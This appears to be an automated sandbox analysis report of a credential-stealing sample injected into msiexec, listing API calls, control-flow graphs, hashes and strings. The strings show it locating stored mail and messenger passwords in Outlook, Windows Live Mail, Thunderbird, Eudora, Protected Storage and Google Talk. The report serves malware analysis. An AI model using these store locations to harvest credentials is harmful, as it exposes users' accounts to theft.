                                                                                                     Output 40affa: 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX -> 40b01f GetStdHandle / 406d1a CreateFileA -> 40b01c -> 40b035 -> 406c62 LoadCursorA SetCursor -> 40b042 -> 40a57c strlen WriteFile / 40b087 -> 40a699 (12 API calls) -> 40b0a1 -> 406d77 (9 API calls) -> 40b0d6 -> 40b116 CloseHandle -> 40b11f SetCursor -> 40b136 -> 40c580 (28 API calls); or 40b12d -> 406d77 (9 API calls) -> 40b136.
                                                                                                     GUI: 40d0a0 CoInitialize -> 40cc26 strncat memset RegisterClassA CreateWindowExA -> 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA -> 40c256 PostMessageA -> 40d0f9 GetMessageA -> message loop 40d10d: 40d113 TranslateAccelerator, 40d139 IsDialogMessage, 40d145 IsDialogMessage, 40d157 TranslateMessage DispatchMessageA, 40d16d GetMessageA -> 40d17b CoUninitialize -> teardown.
                                                                                                     Teardown: 40d181 ??3@YAXPAX (40d19f DeleteObject) -> 40d1b3 -> 407948 free free -> 40d1c4 -> 4080d4 free -> 40d1cd -> 407948 free free -> 40cf64.
                                                                                                     Other connected fragments: 44b33b -> ??3@YAXPAX at 44b344, 44b354, 44b364, 44b374 -> 44b37b; 410b92 -> 410a6b -> 410a77 -> 410983 memset _itoa WritePrivateProfileStringA / 410a89 GetPrivateProfileIntA -> 410bb2; 410bbc -> 4109cf -> 4109dc -> 4109ea memset -> 4075cd sprintf memcpy -> 410a0c WritePrivateProfileStringA / 410a23 memset GetPrivateProfileStringA -> 407646 strlen -> 40765c -> 40737c strtoul loop -> 4076a3 -> 410a65.
                                                                                                     Unconnected nodes (a selection; the rest of the dump is of this kind and mostly collapsed): 44b3cf (750 API calls), 43f5fc (149 API calls), 43fedc (138 API calls), 40bbf0 (133 API calls), 43fe40 (133 API calls), 40c5c3 (123 API calls), 425115 __fprintf_l (many collapsed variants), 401445 memcpy memcpy DialogBoxParamA, 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows, 4014b7 CreateWindowExA, 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX, 40176c ExitProcess, 403a26 strlen WriteFile, 405f04 SetDlgItemTextA GetDlgItemTextA, 40a3b8 memset sprintf SendMessageA, 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA, 40b5bf memset memset _mbsicmp, 410be6 WritePrivateProfileStringA GetPrivateProfileStringA, 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA, 410c68 FindResourceA SizeofResource LoadResource LockResource, 410cf3 EnumResourceNamesA, 410e98 memset SHGetPathFromIDList SendMessageA, 411853 RtlInitializeCriticalSection memset, 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection, 411814 InterlockedCompareExchange RtlDeleteCriticalSection, 4118b4 RtlEnterCriticalSection, 4118bf RtlTryEnterCriticalSection, 4118ee RtlLeaveCriticalSection, 412e43 _endthreadex, 413f11 strcmp, 441d9c memcmp, 444b11 _onexit, 444b1f __dllonexit, 444dd7 _XcptFilter, 444deb _exit _c_exit, 44b2c5 _onexit __dllonexit, 44b301 ??3@YAXPAX, 44b323 FreeLibrary.

Control-flow Graph: function at 4082cd
APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150

Control-flow Graph: function at 407ef8
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
• strlen.MSVCRT ref: 00407F64
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: ACD
• API String ID: 379999529-620537770

Control-flow Graph
APIs
• memset.MSVCRT ref: 00401E8B
• strlen.MSVCRT ref: 00401EA4
• strlen.MSVCRT ref: 00401EB2
• strlen.MSVCRT ref: 00401EF8
• strlen.MSVCRT ref: 00401F06
• memset.MSVCRT ref: 00401FB1
• atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
• memset.MSVCRT ref: 00402003
• sprintf.MSVCRT ref: 00402030
• memset.MSVCRT ref: 00402086
• memset.MSVCRT ref: 0040209B
• strlen.MSVCRT ref: 004020A1
• strlen.MSVCRT ref: 004020AF
• strlen.MSVCRT ref: 004020E2
• strlen.MSVCRT ref: 004020F0
• memset.MSVCRT ref: 00402018
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
• _mbscpy.MSVCRT(?,00000000), ref: 00402177
Similarity
• API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 3833278029-4223776976

Control-flow Graph
APIs
  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
• DeleteObject.GDI32(?), ref: 0040D1A6
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210

Control-flow Graph
APIs
  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
• _mbscpy.MSVCRT(?,?), ref: 00403E54
Strings
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
• www.google.com/Please log in to your Google Account, xrefs: 00403C9A
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
• www.google.com/Please log in to your Gmail account, xrefs: 00403C86
• www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
• pstorec.dll, xrefs: 00403C30
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
• PStoreCreateInstance, xrefs: 00403C44
Similarity
• API ID: Library$AddressFreeLoadProc_mbscpy
• String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
• API String ID: 1197458902-317895162

Control-flow Graph: function at 44b49f
Similarity
• API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID: h4ND
• API String ID: 3662548030-3825183422

Control-flow Graph
APIs
• memset.MSVCRT ref: 0044430B
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
• memset.MSVCRT ref: 00444379
• memset.MSVCRT ref: 00444394
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
• strlen.MSVCRT ref: 004443DB
• _strcmpi.MSVCRT ref: 00444401
Strings
• Store Root, xrefs: 004443A5
• Software\Microsoft\Windows Live Mail, xrefs: 004443AA
• \Microsoft\Windows Live Mail, xrefs: 00444350
• \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                    Similarity
                                                                                                    • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                    • API String ID: 3203569119-2578778931
                                                                                                    • Opcode ID: 084e1bc9afca8c0106b47a78fe7cf29dd96ddef5f2ad11b86a5d00e222a1a2d5
                                                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                    • Opcode Fuzzy Hash: 084e1bc9afca8c0106b47a78fe7cf29dd96ddef5f2ad11b86a5d00e222a1a2d5
                                                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                     Control-flow Graph
                                                                                                    control_flow_graph 283 40ccd7-40cd06 ??2@YAPAXI@Z 284 40cd08-40cd0d 283->284 285 40cd0f 283->285 286 40cd11-40cd24 ??2@YAPAXI@Z 284->286 285->286 287 40cd26-40cd2d call 404025 286->287 288 40cd2f 286->288 290 40cd31-40cd57 287->290 288->290 292 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 290->292 293 40cd59-40cd60 DeleteObject 290->293 293->292
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                    • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                    • memset.MSVCRT ref: 0040CD96
                                                                                                    • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2054149589-0
                                                                                                    • Opcode ID: 3122acd30c0617eacb2afd047b7a336f9301861a29c926e86494a36dd5557137
                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                    • Opcode Fuzzy Hash: 3122acd30c0617eacb2afd047b7a336f9301861a29c926e86494a36dd5557137
                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                     Control-flow Graph
                                                                                                    control_flow_graph 300 40ba28-40ba3a 301 40ba87-40ba9b call 406c62 300->301 302 40ba3c-40ba52 call 407e20 _mbsicmp 300->302 324 40ba9d call 4107f1 301->324 325 40ba9d call 404734 301->325 326 40ba9d call 404785 301->326 327 40ba9d call 403c16 301->327 307 40ba54-40ba6d call 407e20 302->307 308 40ba7b-40ba85 302->308 314 40ba74 307->314 315 40ba6f-40ba72 307->315 308->301 308->302 309 40baa0-40bab3 call 407e30 316 40bab5-40bac1 309->316 317 40bafa-40bb09 SetCursor 309->317 318 40ba75-40ba76 call 40b5e5 314->318 315->318 319 40bac3-40bace 316->319 320 40bad8-40baf7 qsort 316->320 318->308 319->320 320->317 324->309 325->309 326->309 327->309
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 882979914-1578091866
                                                                                                    • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                    • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004109F7
                                                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                    • memset.MSVCRT ref: 00410A32
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3143880245-0
                                                                                                    • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                    • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                                     Control-flow Graph
                                                                                                    control_flow_graph 351 44b33b-44b342 352 44b344-44b34a ??3@YAXPAX@Z 351->352 353 44b34b-44b352 351->353 352->353 354 44b354-44b35a ??3@YAXPAX@Z 353->354 355 44b35b-44b362 353->355 354->355 356 44b364-44b36a ??3@YAXPAX@Z 355->356 357 44b36b-44b372 355->357 356->357 358 44b374-44b37a ??3@YAXPAX@Z 357->358 359 44b37b 357->359 358->359
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                                     Control-flow Graph
                                                                                                    control_flow_graph 360 410dbb-410dd2 call 410d0e 363 410dd4-410ddd call 4070ae 360->363 364 410dfd-410e1b memset 360->364 371 410ddf-410de2 363->371 372 410dee-410df1 363->372 366 410e27-410e35 364->366 367 410e1d-410e20 364->367 370 410e45-410e4f call 410a9c 366->370 367->366 369 410e22-410e25 367->369 369->366 373 410e37-410e40 369->373 377 410e51-410e76 call 410d3d call 410add 370->377 378 410e7f-410e92 _mbscpy 370->378 371->364 375 410de4-410de7 371->375 380 410df8 372->380 373->370 375->364 379 410de9-410dec 375->379 377->378 382 410e95-410e97 378->382 379->364 379->372 380->382
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76230A60,?,00000000), ref: 00410D1C
                                                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                    • memset.MSVCRT ref: 00410E10
                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 119022999-2036018995
                                                                                                    • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                    • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                                     Control-flow Graph
                                                                                                    control_flow_graph 386 4085d2-408605 call 44b090 call 4082cd call 410a9c 393 4086d8-4086dd 386->393 394 40860b-40863d memset call 410b62 386->394 397 4086c7-4086cc 394->397 398 408642-40865a call 410a9c 397->398 399 4086d2 397->399 402 4086b1-4086c2 call 410b62 398->402 403 40865c-4086ab memset call 410add call 40848b 398->403 399->393 402->397 403->402
                                                                                                    APIs
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                    • memset.MSVCRT ref: 00408620
                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                    • memset.MSVCRT ref: 00408671
                                                                                                    Strings
                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                    • API String ID: 3996936265-1079885057
                                                                                                    • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                    • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                     Control-flow Graph
                                                                                                    control_flow_graph 434 40ce70-40cea1 call 4023b2 call 401e69 439 40cea3-40cea6 434->439 440 40ceb8 434->440 442 40ceb2 439->442 443 40cea8-40ceb0 439->443 441 40cebd-40cecc _strcmpi 440->441 444 40ced3-40cedc call 40cdda 441->444 445 40cece-40ced1 441->445 446 40ceb4-40ceb6 442->446 443->446 447 40cede-40cef7 call 40c3d0 call 40ba28 444->447 451 40cf3f-40cf43 444->451 445->447 446->441 455 40cef9-40cefd 447->455 456 40cf0e 447->456 457 40cf0a-40cf0c 455->457 458 40ceff-40cf08 455->458 459 40cf13-40cf30 call 40affa 456->459 457->459 458->459 461 40cf35-40cf3a call 40c580 459->461 461->451
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 520177685-3817206916
                                                                                                    • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                    • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 145871493-0
                                                                                                    • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                    • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4165544737-0
                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                    Memory Dump Source
